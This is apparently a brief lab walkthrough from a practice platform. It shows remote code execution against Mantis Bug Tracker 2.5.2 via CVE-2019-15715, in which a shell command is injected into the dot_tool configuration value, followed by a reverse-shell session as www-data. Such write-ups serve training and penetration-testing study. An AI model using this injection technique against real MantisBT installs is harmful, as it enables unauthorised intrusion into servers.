InfoSec LAB

Mantis_OffSec_Exploitation

Created: 2 min read

Remote Code Execution

The target Mantis But Tracker is suspected to be vulnerable to CVE-2019-15715 due to its outdated version; 2.5.2 Following the exploit

relationship_graph_enable

Creating a configuration option for relationship_graph_enable with a value of 1

dot_tool

Creating another configuration option for dot_tool with the payload in the value field; echo CVE-2019-15715 > /var/www/html/bugtracker/blah.txt; The key is the ; character at the end

Trigger

All set

Invoking..

Code execution confirmed

Exploitation

Editing the payload in thee dot_tool configuration option

Invoking..

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/mantis_offsec]
└─$ nnc 9999             
listening on [any] 9999 ...
connect to [192.168.45.157] from (UNKNOWN) [192.168.135.204] 46690
bash: cannot set terminal process group (31321): Inappropriate ioctl for device
bash: no job control in this shell
www-data@mantis:/var/www/html/bugtracker$ whoami
whoami
www-data
www-data@mantis:/var/www/html/bugtracker$ hostname
hostname
mantis
www-data@mantis:/var/www/html/bugtracker$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:50:56:9e:ab:3d brd ff:ff:ff:ff:ff:ff
    inet 192.168.135.204/24 brd 192.168.135.255 scope global noprefixroute ens160
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:fe9e:ab3d/64 scope link 
       valid_lft forever preferred_lft forever

Initial Foothold established to the target system as the www-data account via exploiting CVE-2019-15715

Interactive Graph View

Backlinks